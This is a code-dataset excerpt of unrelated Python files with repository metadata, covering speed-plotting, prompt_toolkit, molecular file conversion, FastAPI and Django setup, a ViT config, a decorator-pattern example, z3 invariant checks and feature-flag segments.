    averaged = np.convolve(finite, weights, 'valid')  # moving average
    return clean_extreme(averaged)
def create_plots(frames, fig):
    """Add one subplot per data series to `fig` on a 3x2 grid.

    Each series is converted to numeric speeds, smoothed, and plotted with
    its mean and median reference lines. Returns the largest smoothed value
    seen across all series.
    """
    ymax = 0
    colors_cubic = ['#00FF00', '#00DD11', '#00AA22'] # RRGGBB, greenish colors for cubic
    colors_lead = ['#FF0000', '#DD0011', '#AA0022'] ## RRGGBB, reddish colors for lead
    next_cubic = 0
    next_lead = 0
    next_plot = 1 # should start with 1
    for key, frame in frames.items():
        df = frames[key]
        # set dataframe size
        array = np.array(df[key].values)
        array = convert_speed(array)
        ym = np.mean(array)
        # Wider smoothing window for cubic/lead traces (both end up at 80).
        w = 50
        if "cubic" in key:
            w = 80
        elif "lead" in key:
            w = 80
        array = fabric_softener(array, window=w)
        size = len(array)
        y_mean = [ym]*len(array)
        ymd = np.median(array)
        y_median = [ymd] * len(array)
        x_axis = range(0,size)
        local_ymax = np.amax(array)
        #local_ymean = np.mean(array)
        if local_ymax > ymax:
            ymax = local_ymax
        # Select line style, solid for cubic, dashed for lead
        lstyle = 'solid'
        if "lead" in key:
            lstyle='dashed'
            coldata = colors_lead[0]
            colmean = colors_lead[1]
            colmedian = colors_lead[2]
        if "cubic" in key:
            lstyle='solid'
            coldata = colors_cubic[0]
            colmean = colors_cubic[1]
            colmedian = colors_cubic[2]
        # NOTE(review): if a key contains neither "cubic" nor "lead",
        # coldata/colmean/colmedian are never assigned and the plot call
        # below raises NameError — confirm every key carries one tag.
        # create subplot
        axi = fig.add_subplot(3, 2, next_plot) # rows, cols, plot number
        axi.plot(x_axis, array, color=coldata, linestyle=lstyle, label=key)
        # add mean line
        lbl = "Sistemlerde raporlanan ortalama hız=" + convert_number_to_KMG(ym)
        axi.plot(x_axis, y_mean, color=colmean, linestyle="-.", label=lbl)
        # add median line
        lbl = "Gerçekte hissedilen ortanca hız=" + convert_number_to_KMG(ymd)
        axi.plot(x_axis, y_median, color=colmedian, linestyle=":", label=lbl)
        # axi.set_xlabel('İndirilen parça')
        ylim = 1.1 * local_ymax
        axi.set_ylim(0, ylim)
        axi.set_ylabel('Parçanın indirilme hızı')
        axi.set_title(key)
        axi.legend()
        next_plot = next_plot + 1
    return ymax
#All data series have been added to plot
warnings.filterwarnings("ignore")
# Three downloads, each measured under two congestion-control variants.
names = ['astro-cubic.out', 'astro-lead.out',
        'guppy-cubic.out', 'guppy-lead.out',
        'interview-cubic.out', 'interview-lead.out']
# needed = [7]: presumably the wget log column holding the speed — TODO confirm.
needed = [7]
frames = load_files(filenames=names, cols=needed)
plt.style.use('seaborn-whitegrid')
fig = plt.figure()
ymax = create_plots(frames, fig)
# f, axarr = plt.subplots(6)
#for index in range(6):
#    axarr[index].set_ylim(0, ymax)
plt.show()
# plt.savefig('the_best_plot.pdf')
| [
"blog1234@GITHUB"
] | blog1234@GITHUB |
40dfe239746f14da2cd97adf27df4e81ed29da65 | 4f7140c62cc649373379941224072c9e6b707ef7 | /examples/prompts/clock-input.py | fd1f8760ed2e77af6f65fbae97fa63ce949125fe | [
"BSD-3-Clause"
] | permissive | qianhaohu/python-prompt-toolkit | 03d282a0a6a258a08ef822bc342a6b7fb65667f7 | 237cf46ff50c8a689a72e3dfe664dfe69bffd245 | refs/heads/master | 2020-05-16T05:19:38.934218 | 2019-04-16T19:10:07 | 2019-04-16T19:40:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | #!/usr/bin/env python
"""
Example of a 'dynamic' prompt. On that shows the current time in the prompt.
"""
from __future__ import unicode_literals
import datetime
from prompt_toolkit.shortcuts import prompt
def get_prompt():
" Tokens to be shown before the prompt. "
now = datetime.datetime.now()
return [
('bg:#008800 #ffffff', '%s:%s:%s' % (now.hour, now.minute, now.second)),
('bg:cornsilk fg:maroon', ' Enter something: ')
]
def main():
result = prompt(get_prompt, refresh_interval=.5)
print('You said: %s' % result)
if __name__ == '__main__':
main()
| [
"jonathan@slenders.be"
] | jonathan@slenders.be |
5d9c0e1d64a54205baad6cd4387d049d7075add4 | 96622790b66e45926b79bc524ec75a0f4d53a7eb | /src/misc-preprocessing-scripts/maeToPdb.py | 607322e4c183184fce0eb9365a2c80401d9cb81f | [] | no_license | akma327/GPCR-WaterDynamics | a8c2e13e18f953b6af66a3e669052cb3eacd346b | 685f4dea0605d65c003bf952afd964df6e605b06 | refs/heads/master | 2021-01-22T07:42:42.539496 | 2017-05-27T07:23:44 | 2017-05-27T07:23:44 | 92,574,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,514 | py | # Author: Anthony Kai Kwang Ma
# Email: akma327@stanford.edu
# maeToPdb.py
# MAE To PDB File Converter
# Usage:
# python maeToPdb.py <input path to mae> <output path for pdb> <optional pdb file name>
# <input path to mae> Provide the absolute path to the mae file name
# <output path for pdb> Provide the directory path to store the pdb
# <optional pdb file name> Default is to rename the pdb to the same prefix as mae, but user can specify new name
# Example:
#
import vmd, molecule
import sys
PROPER_USAGE_STR = """
# Usage:
# python maeToPdb.py <input path to mae> <output path for pdb> <optional pdb file name>
# <input path to mae> Provide the absolute path to the mae file name
# <output path for pdb> Provide the directory path to store the pdb
# <optional pdb file name> Default is to rename the pdb to the same prefix as mae, but user can specify new name
# Example:
# INPUT_MAE_PATH="/scratch/PI/rondror/DesRes-Simulations/ordered-from-DesRes/nature2013/DESRES-Trajectory_nature2013-AA-all/DESRES-Trajectory_nature2013-AA-58-all/nature2013-AA-58-all/nature2013-AA-58-all.mae"
# OUTPUT_PDB_PATH="/scratch/PI/rondror/akma327/noncovalent_Interaction_Scripts/DynamicInteractions/tools"
# PDB_FILE_NAME="nature2013-AA-58-new.pdb"
# python maeToPdb.py $INPUT_MAE_PATH $OINPUT_MAE_PATH="/scratch/PI/rondror/DesRes-Simulations/ordered-from-DesRes/nature2013/DESRES-Trajectory_nature2013-AA-all/DESRES-Trajectory_nature2013-AA-58-all/nature2013-AA-58-all/nature2013-AA-58-all.mae"
# OUTPUT_PDB_PATH="/scratch/PI/rondror/akma327/noncovalent_Interaction_Scripts/DynamicInteractions/tools"
# PDB_FILE_NAME="nature2013-AA-58-new.pdb"
# python maeToPdb.py $INPUT_MAE_PATH $OUTPUT_PDB_PATH $PDB_FILE_NAME UTPUT_PDB_PATH $PDB_FILE_NAME """
MIN_NUM_ARGS = 3
# import vmd, molecule
# input_mae_path= "nature2011-B-all.mae"
# output_pdb_file_path = "step5_assembly.pdb"
# molid = molecule.load('mae', input_mae_path)
# molecule.write(molid, 'pdb', output_pdb_file_path)
# import mdtraj as md
# t = md.load('step5_assembly.pdb')
def maeToPdb(input_mae_path, output_pdb_file_path):
    """Convert a Maestro (.mae) structure file to PDB via VMD's molecule API."""
    mol_id = molecule.load('mae', input_mae_path)
    molecule.write(mol_id, 'pdb', output_pdb_file_path)
    print("Finished Conversion for: " + str(input_mae_path))
if __name__ == "__main__":
    # Require at least: script name, input .mae path, output directory.
    if(len(sys.argv) < MIN_NUM_ARGS):
        print("Invalid Arguments")
        print(PROPER_USAGE_STR)
        exit(0)
    input_mae_path = sys.argv[1]
    output_pdb_path = sys.argv[2]
    # NOTE(review): the optional third argument (pdb file name) described in
    # the usage string is never read here — confirm whether it is needed.
    print(input_mae_path, output_pdb_path)
    maeToPdb(input_mae_path, output_pdb_path)
| [
"akma327@stanford.edu"
] | akma327@stanford.edu |
76afa7bf1b600d48448d076af1549d5dee42b27e | 17017d64ba355c423ec146f8dcf2abe745803aac | /rest_api/global_utils.py | 58307a392dd4193c4457f4acd427f783e59cab78 | [
"Apache-2.0"
] | permissive | saikrishna9494/obsei | 1fc9869ef9b0dca2567918cc469e266fba937656 | 47d4716961d5b1429a964dbc9fc8fa241afac2d5 | refs/heads/master | 2023-02-17T12:37:44.757908 | 2021-01-11T22:58:01 | 2021-01-11T22:58:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | import logging
from typing import Dict
from fastapi import APIRouter, FastAPI, HTTPException
from flask import Request
from starlette.middleware.cors import CORSMiddleware
from starlette.responses import JSONResponse
from obsei.sink.base_sink import BaseSink
from obsei.sink.dailyget_sink import DailyGetSink
from obsei.sink.elasticsearch_sink import ElasticSearchSink
from obsei.sink.http_sink import HttpSink
from obsei.sink.jira_sink import JiraSink
from obsei.source.base_source import BaseSource
from obsei.source.playstore_reviews import PlayStoreSource
from obsei.source.twitter_source import TwitterSource
logger = logging.getLogger(__name__)
# Registry of available observation sources, keyed by their public name.
source_map: Dict[str, BaseSource] = {
    "Twitter": TwitterSource(),
    "PlayStore": PlayStoreSource()
}
# Registry of available sinks (where analyzed results are delivered).
sink_map: Dict[str, BaseSink] = {
    "Http": HttpSink(),
    "Jira": JiraSink(),
    "DailyGet": DailyGetSink(),
    "Elasticsearch": ElasticSearchSink(),
}
# Shared router that endpoint modules attach their routes to.
router = APIRouter()
async def http_error_handler(_: Request, exc: HTTPException) -> JSONResponse:
    # Render any HTTPException as a JSON body of the form {"errors": [...]}.
    payload = {"errors": [exc.detail]}
    return JSONResponse(payload, status_code=exc.status_code)
def get_application() -> FastAPI:
    """Build and configure the Obsei FastAPI application."""
    app = FastAPI(
        title="Obsei-APIs",
        debug=True,
        version="0.1",
        description="Observe, Segment and Inform",
    )
    # Permissive CORS: any origin, method, and header is accepted.
    app.add_middleware(
        CORSMiddleware,
        allow_origins=["*"],
        allow_credentials=True,
        allow_methods=["*"],
        allow_headers=["*"],
    )
    app.add_exception_handler(HTTPException, http_error_handler)
    app.include_router(router)
    return app
| [
"pagaria.lalit@gmail.com"
] | pagaria.lalit@gmail.com |
0a69a74b8880af5c134087789b062ef0e4fa1361 | 2c36c1bbad8fa78ba23449d50961acbcc3860677 | /manage.py | aa6b62d482ebce0ff6cb50a2269e7722fbb85a05 | [] | no_license | pg999/umeed | eabb6fc706039d1da48ce4e4d38a91877f171c7a | 2bffaf9ef252d7c3712a3582f9e86c4a1c8d3d61 | refs/heads/master | 2020-12-31T00:30:05.922844 | 2017-04-01T23:44:06 | 2017-04-01T23:44:06 | 86,511,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings before any management command runs.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "umeed.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
"pramudgupta@gmail.com"
] | pramudgupta@gmail.com |
d6d93cb282a9b64ae57a7522d83152c22b1aae24 | 6814b9b28204fa58f77598d01c760ddeb4b66353 | /baselines/jft/experiments/jft300m_vit_base16_heteroscedastic_finetune_cifar.py | 8384bfa093ad4ce0435cbcdfa7302096e6fa5720 | [
"Apache-2.0"
] | permissive | qiao-maoying/uncertainty-baselines | a499951ea1450323e00fe03891ba8f781fe1cdc7 | 54dce3711b559ae3955a8a7d05c88eb982dea470 | refs/heads/main | 2023-07-17T23:17:10.867509 | 2021-08-18T20:32:11 | 2021-08-18T20:32:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,620 | py | # coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=line-too-long
r"""Finetune a ViT-B/16 heteroscedastic model on CIFAR-10.
"""
# pylint: enable=line-too-long
import ml_collections
# TODO(dusenberrymw): Open-source remaining imports.
def get_sweep(hyper):
  """Return an empty hyperparameter sweep (a single default configuration)."""
  return hyper.product([])
def get_config():
  """Config for training a patch-transformer on JFT."""
  config = ml_collections.ConfigDict()
  # Fine-tuning dataset: CIFAR-10 with a 98%/2% train/validation split.
  config.dataset = 'cifar10'
  config.val_split = 'train[98%:]'
  config.train_split = 'train[:98%]'
  config.num_classes = 10
  BATCH_SIZE = 512  # pylint: disable=invalid-name
  config.batch_size = BATCH_SIZE
  # Total number of fine-tuning steps.
  config.total_steps = 10_000
  # Images are resized/cropped to this resolution for fine-tuning.
  INPUT_RES = 384  # pylint: disable=invalid-name
  pp_common = '|value_range(-1, 1)'
  # pp_common += f'|onehot({config.num_classes})'
  # To use ancestor 'smearing', use this line instead:
  pp_common += f'|onehot({config.num_classes}, key="label", key_result="labels")'  # pylint: disable=line-too-long
  pp_common += '|keep("image", "labels")'
  config.pp_train = f'decode|inception_crop({INPUT_RES})|flip_lr' + pp_common
  config.pp_eval = f'decode|resize({INPUT_RES})' + pp_common
  config.shuffle_buffer_size = 50_000  # Per host, so small-ish is ok.
  config.log_training_steps = 10
  config.log_eval_steps = 100
  # NOTE: eval is very fast O(seconds) so it's fine to run it often.
  config.checkpoint_steps = 1000
  config.checkpoint_timeout = 1
  config.prefetch_to_device = 2
  config.trial = 0
  # Model section
  # pre-trained model ckpt file
  # !!! The below section should be modified per experiment
  config.model_init = '/path/to/pretrained_model_ckpt.npz'
  # Model definition to be copied from the pre-training config
  config.model = ml_collections.ConfigDict()
  config.model.patches = ml_collections.ConfigDict()
  config.model.patches.size = [16, 16]
  config.model.hidden_size = 768
  config.model.transformer = ml_collections.ConfigDict()
  config.model.transformer.attention_dropout_rate = 0.
  config.model.transformer.dropout_rate = 0.
  config.model.transformer.mlp_dim = 3072
  config.model.transformer.num_heads = 12
  config.model.transformer.num_layers = 12
  config.model.classifier = 'token'  # Or 'gap'
  # This is "no head" fine-tuning, which we use by default
  config.model.representation_size = None
  # # Heteroscedastic head settings.
  config.model.multiclass = True
  config.model.temperature = 3.0
  config.model.mc_samples = 1000
  config.model.num_factors = 3
  config.model.param_efficient = True
  config.model.return_locs = True  # set True to fine-tune a homoscedastic model
  # Optimizer section
  config.optim_name = 'Momentum'
  config.optim = ml_collections.ConfigDict()
  config.grad_clip_norm = 1.0
  config.weight_decay = None  # No explicit weight decay
  config.loss = 'softmax_xent'  # or 'sigmoid_xent'
  config.lr = ml_collections.ConfigDict()
  config.lr.base = 0.001
  config.lr.warmup_steps = 500
  config.lr.decay_type = 'cosine'
  config.lr.scale_with_batchsize = False
  config.args = {}
  return config
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
5cffb5a2fb9d408a8f4fe88b0e46d790428e9c92 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/Decorator/alldecorators/CoffeeShop.py | 9e4861b473c3803d1d2a0b2ad0b382e4cce35f7a | [] | no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 1,722 | py | # Decorator/alldecorators/CoffeeShop.py
# Coffee example using decorators
class DrinkComponent:
    """Base component: describes itself by class name, priced by class attr `cost`."""
    def getDescription(self):
        # A component's description is simply its class name.
        return type(self).__name__
    def getTotalCost(self):
        return type(self).cost
class Mug(DrinkComponent):
    # Base drink container: contributes nothing to the price.
    cost = 0.0
class Decorator(DrinkComponent):
    """Wraps another DrinkComponent, accumulating cost and description."""
    def __init__(self, drinkComponent):
        self.component = drinkComponent
    def getTotalCost(self):
        # Wrapped component's total plus this decorator's own class cost.
        own_cost = DrinkComponent.getTotalCost(self)
        return self.component.getTotalCost() + own_cost
    def getDescription(self):
        inner = self.component.getDescription()
        return inner + ' ' + DrinkComponent.getDescription(self)
class Espresso(Decorator):
    # Espresso shot: adds $0.75 to the wrapped drink.
    cost = 0.75
    def __init__(self, drinkComponent):
        Decorator.__init__(self, drinkComponent)
class Decaf(Decorator):
    # Decaf option: free, only changes the description.
    cost = 0.0
    def __init__(self, drinkComponent):
        Decorator.__init__(self, drinkComponent)
class FoamedMilk(Decorator):
    # Foamed milk: adds $0.25.
    cost = 0.25
    def __init__(self, drinkComponent):
        Decorator.__init__(self, drinkComponent)
class SteamedMilk(Decorator):
    # Steamed milk: adds $0.25.
    cost = 0.25
    def __init__(self, drinkComponent):
        Decorator.__init__(self, drinkComponent)
class Whipped(Decorator):
    # Whipped cream: adds $0.25.
    cost = 0.25
    def __init__(self, drinkComponent):
        Decorator.__init__(self, drinkComponent)
class Chocolate(Decorator):
    # Chocolate: adds $0.25.
    cost = 0.25
    def __init__(self, drinkComponent):
        Decorator.__init__(self, drinkComponent)
# Build a cappuccino (espresso + foamed milk in a mug) and price it.
cappuccino = Espresso(FoamedMilk(Mug()))
# Bug fix: the original used Python 2 backtick-repr plus a broken
# `print(... + \)` continuation, a syntax error in any Python version;
# rewritten as valid Python 3 with repr().
print(cappuccino.getDescription().strip() +
      ": $" + repr(cappuccino.getTotalCost()))
cafeMocha = Espresso(SteamedMilk(Chocolate(
    Whipped(Decaf(Mug())))))
print(cafeMocha.getDescription().strip() +
      ": $" + repr(cafeMocha.getTotalCost()))
| [
"mindviewinc@gmail.com"
] | mindviewinc@gmail.com |
e83fa49521cb17a21319c4c22cda47db9118190a | ba1cc1f90570913b7ee128478cf38ab84e84ab4a | /manage.py | 9a6fa64800ceaa9d67992d74c534d8adddc70889 | [] | no_license | splendidbug/predict_flight_fare | a5406d3d244ffbfbd130ae56e9c370ead1141411 | 3ccdf79721efcdb64c644e193a0bb56a902ffccf | refs/heads/main | 2023-05-23T08:10:55.221448 | 2021-06-11T12:59:50 | 2021-06-11T12:59:50 | 328,111,693 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Default settings module for this project; an already-set env var wins.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'flight_fare_prediction.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| [
"shreyasanother@gmail.com"
] | shreyasanother@gmail.com |
81be308241c8f04597fd75058567bc25aa622153 | 89c81953eb880ccf5e931af3395b1ed0b6c7db1d | /gcln_model/z3_checks/divbin_z3.py | 9d8a4705fedb8c62b6ac992945309c55ae8ae7b5 | [] | no_license | jyao15/G-CLN | 696ae44f12e2633ea53288a0eaac7111c20b8242 | 65bdb32c4bb9f0902c72cc7d048ab3d6b59c0739 | refs/heads/master | 2022-12-29T20:44:04.600400 | 2022-12-29T04:17:32 | 2022-12-29T04:17:32 | 265,091,891 | 10 | 10 | null | null | null | null | UTF-8 | Python | false | false | 2,942 | py | from z3 import *
import z3_checks.core
# import core
def get_checks(z3_vars, z3_var2s, loop_idx=2):
    """Build the z3 verification pieces for the divbin benchmark.

    Returns (loop condition, precondition, transition relation, postcondition,
    candidate equalities, candidate inequalities) for the requested loop.
    Primed variables (A2, ...) denote post-iteration values. The
    postcondition is currently None (TODO) for both loops.
    """
    A, B, q, r, b = (z3_vars[v] for v in 'A B q r b'.split())
    A2, B2, q2, r2, b2 = (z3_var2s[v] for v in 'A2 B2 q2 r2 b2'.split())
    if loop_idx == 1:
        # Loop 1 doubles b while r >= b; everything else is unchanged.
        lc = r >= b
        pre = And(A > 0, B > 0, q == 0, r == A, b == B)
        rec = And(b2 == 2*b, A2==A, B2==B, q2==q, r2==r)
        post = None # TODO
        # q = 0, A=r; b > 0; r>0
        eq = And(q == 0, A==r)
        ineq = And(b>0, r>0)
        return lc, pre, rec, post, eq, ineq
    elif loop_idx == 2:
        # Loop 2 halves b each step and conditionally subtracts it from r.
        lc = b != B
        pre = And(q == 0, A == r, b > 0, r > 0, r < b)
        rec = And(A2 == A, B2 == B, b2 == b/2, b == 2 * b2,
                  Or(And(r >= b2, q2 == 2 * q + 1, r2 == r - b2),
                     And(r < b2, q2 == 2 * q, r2 == r)))
        post = None# TODO
        return lc, pre, rec, post, (), ()
def full_check(z3_vars, invariant, loop_index):
    """Check that `invariant` is a valid inductive loop invariant for divbin.

    Verifies the Hoare conditions (precondition implies invariant, invariant
    is preserved by one iteration, invariant plus loop exit implies the
    postcondition) by asking z3 whether their conjunction's negation is
    satisfiable. Returns (True, None) if valid, (False, None) if z3 answers
    unknown, and (False, model) with a counterexample otherwise.
    """
    z3_vars2, subs = core.gen_var2s_subs(z3_vars)
    A, B, q, r, b = [z3_vars[v] for v in 'A B q r b'.split()]
    A2, B2, q2, r2, b2 = [z3_vars2[v] for v in 'A2 B2 q2 r2 b2'.split()]
    # invariant2 is the invariant over the primed (post-iteration) variables.
    invariant2 = z3.substitute(invariant, subs)
    solver = z3.Solver()
    if loop_index == 1:
        lc = r >= b
        pre = And(A > 0, B > 0, q == 0, r == A, b == B)
        rec = And(A2 == A, B2 == B, q2 == q, r2 == r, b2 == 2 * b)
        post = And(q == 0, A == r, b > 0, r > 0, r < b)
        solver.add(Not(And(Implies(pre, invariant),
                           Implies(And(invariant, lc, rec), invariant2),
                           Implies(And(invariant, Not(lc)), post))))
    else:
        assert loop_index == 2
        lc = b != B
        pre = And(q == 0, A == r, b > 0, r > 0, r < b)
        rec = And(A2 == A, B2 == B, b2 == b/2, b == 2 * b2,
                  Or(And(r >= b2, q2 == 2 * q + 1, r2 == r - b2),
                     And(r < b2, q2 == 2 * q, r2 == r)))
        temp = Int('temp')
        # Postcondition: A = q*B + temp with 0 <= temp < B (division result).
        post = Exists(temp, And(temp >= 0, temp < B, A == q * B + temp))
        solver.add(Not(And(Implies(pre, invariant),
                           Implies(And(invariant, lc, rec), invariant2),
                           Implies(And(invariant, Not(lc)), post)
                           )))
    result = solver.check()
    if result == unsat:
        # Negation unsatisfiable: the invariant is valid.
        return True, None
    elif result == unknown:
        return False, None
    else:
        assert result == sat
        return False, solver.model()
if __name__ == '__main__':
    import core
    # Self-test: check the known invariants for both divbin loops.
    z3_vars = {v: Int(v) for v in 'A B q r b'.split()}
    A, B, q, r, b = [z3_vars[v] for v in 'A B q r b'.split()]
    invariant_loop1 = And(q == 0, A == r, b > 0, r > 0)
    result, model = full_check(z3_vars, invariant_loop1, loop_index=1)
    print(result, model)
    invariant_loop2 = And(b * q - A + r == 0, r < b, r >= 0)
    result, model = full_check(z3_vars, invariant_loop2, loop_index=2)
    print(result, model)
| [
"yyljkbgthg2@163.com"
] | yyljkbgthg2@163.com |
975ea230959c3e1c7c686a01d3ad97ce395717b7 | f96ca27fb007ce8c912fc51d32278bc83db53c1f | /featureflags/evaluations/segment.py | 945623500cde0ef435e8d8d91f7b36f2ce119040 | [
"Apache-2.0"
] | permissive | meghamathur03/ff-python-server-sdk | fd36f369a2c038432fe68db3d8b5b195ecc90be4 | 33b599aea44c0fe0854836f271642b23c96b7bb2 | refs/heads/main | 2023-08-13T11:49:52.787018 | 2021-08-19T20:33:41 | 2021-08-19T20:33:41 | 412,287,494 | 0 | 0 | NOASSERTION | 2021-10-01T01:38:43 | 2021-10-01T01:38:43 | null | UTF-8 | Python | false | false | 4,943 | py | from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from featureflags.models import UNSET, Unset
from .auth_target import Target
from .clause import Clause, Clauses
from .tag import Tag
T = TypeVar("T", bound="Segment")
@attr.s(auto_attribs=True)
class Segment(object):
    """A target segment (group) with include/exclude lists and custom rules."""
    identifier: str
    name: str
    environment: Union[Unset, str] = UNSET
    tags: Union[Unset, List[Tag]] = UNSET
    included: Union[Unset, List[str]] = UNSET
    excluded: Union[Unset, List[str]] = UNSET
    rules: Union[Unset, 'Clauses'] = UNSET
    created_at: Union[Unset, int] = UNSET
    modified_at: Union[Unset, int] = UNSET
    version: Union[Unset, int] = UNSET
    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)

    def evaluate(self, target: Target) -> bool:
        """Return True if `target` belongs to this segment.

        Explicit inclusion wins, explicit exclusion vetoes, otherwise the
        custom rules decide.
        """
        if not isinstance(self.included, Unset):
            if target.identifier in self.included:
                return True
        if not isinstance(self.excluded, Unset):
            if target.identifier in self.excluded:
                # Bug fix: an explicitly excluded target must NOT match the
                # segment. The original returned True here, treating the
                # exclusion list exactly like the inclusion list.
                return False
        if not isinstance(self.rules, Unset):
            if self.rules.evaluate(target, None):
                return True
        return False

    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a plain dict, omitting unset optional fields."""
        identifier = self.identifier
        name = self.name
        environment = self.environment
        tags: Union[Unset, List[Dict[str, Any]]] = UNSET
        if not isinstance(self.tags, Unset):
            tags = []
            for tags_item_data in self.tags:
                tags_item = tags_item_data.to_dict()
                tags.append(tags_item)
        included = self.included
        excluded = self.excluded
        rules: Union[Unset, List[Dict[str, Any]]] = UNSET
        if not isinstance(self.rules, Unset):
            rules = []
            for rules_item_data in self.rules:
                rules_item = rules_item_data.to_dict()
                rules.append(rules_item)
        created_at = self.created_at
        modified_at = self.modified_at
        version = self.version
        field_dict: Dict[str, Any] = {}
        # Extra (unknown) properties are preserved round-trip.
        field_dict.update(self.additional_properties)
        field_dict.update(
            {
                "identifier": identifier,
                "name": name,
            }
        )
        if environment is not UNSET:
            field_dict["environment"] = environment
        if tags is not UNSET:
            field_dict["tags"] = tags
        if included is not UNSET:
            field_dict["included"] = included
        if excluded is not UNSET:
            field_dict["excluded"] = excluded
        if rules is not UNSET:
            field_dict["rules"] = rules
        if created_at is not UNSET:
            field_dict["createdAt"] = created_at
        if modified_at is not UNSET:
            field_dict["modifiedAt"] = modified_at
        if version is not UNSET:
            field_dict["version"] = version
        return field_dict

    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Build a Segment from a plain dict; unknown keys become additional_properties."""
        d = src_dict.copy()
        identifier = d.pop("identifier")
        name = d.pop("name")
        environment = d.pop("environment", UNSET)
        tags = []
        _tags = d.pop("tags", UNSET)
        for tags_item_data in _tags or []:
            tags_item = Tag.from_dict(tags_item_data)
            tags.append(tags_item)
        included = d.pop("included", UNSET)
        excluded = d.pop("excluded", UNSET)
        rules: Clauses = Clauses()
        _rules = d.pop("rules", UNSET)
        for rules_item_data in _rules or []:
            rules_item = Clause.from_dict(rules_item_data)
            rules.append(rules_item)
        created_at = d.pop("createdAt", UNSET)
        modified_at = d.pop("modifiedAt", UNSET)
        version = d.pop("version", UNSET)
        segment = cls(
            identifier=identifier,
            name=name,
            environment=environment,
            tags=tags,
            included=included,
            excluded=excluded,
            rules=rules,
            created_at=created_at,
            modified_at=modified_at,
            version=version,
        )
        segment.additional_properties = d
        return segment

    @property
    def additional_keys(self) -> List[str]:
        return list(self.additional_properties.keys())

    def __getitem__(self, key: str) -> Any:
        return self.additional_properties[key]

    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value

    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]

    def __contains__(self, key: str) -> bool:
        return key in self.additional_properties
class Segments(Dict[str, Segment]):
    # Mapping of segment identifier -> Segment.
    def evaluate(self, target: Target) -> bool:
        # True only when the target matches EVERY segment in the map.
        # NOTE(review): requiring all segments is strict — confirm upstream
        # whether "any segment matches" was intended instead.
        for _, segment in self.items():
            if not segment.evaluate(target):
                return False
        return True
| [
"enver.bisevac@harness.io"
] | enver.bisevac@harness.io |
194a5ca0e17d733474329c9789569b457d6c0722 | 96b14e3b708cda4234be2ad79459be9f49db4fec | /lian/urls.py | 145ebb5fee8c7264781a669230d2f958a3cda341 | [] | no_license | snull/liana | 3d4d3d50be568a5b776dcd047cf50c972141dd2b | 48c8e871cb4d6a3b694d189e15ff215bac7cf115 | refs/heads/master | 2021-01-20T17:02:44.176252 | 2017-02-22T14:54:05 | 2017-02-22T14:54:05 | 82,820,891 | 1 | 0 | null | 2017-02-22T15:33:19 | 2017-02-22T15:33:19 | null | UTF-8 | Python | false | false | 807 | py | """lian URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    # Catch-all: delegate every other URL to the app's URLconf.
    # NOTE(review): project is named `lian` but this includes 'liana.urls' —
    # confirm the installed app's actual label.
    url(r'', include('liana.urls')),
]
| [
"AmiraliNull@gmail.com"
] | AmiraliNull@gmail.com |
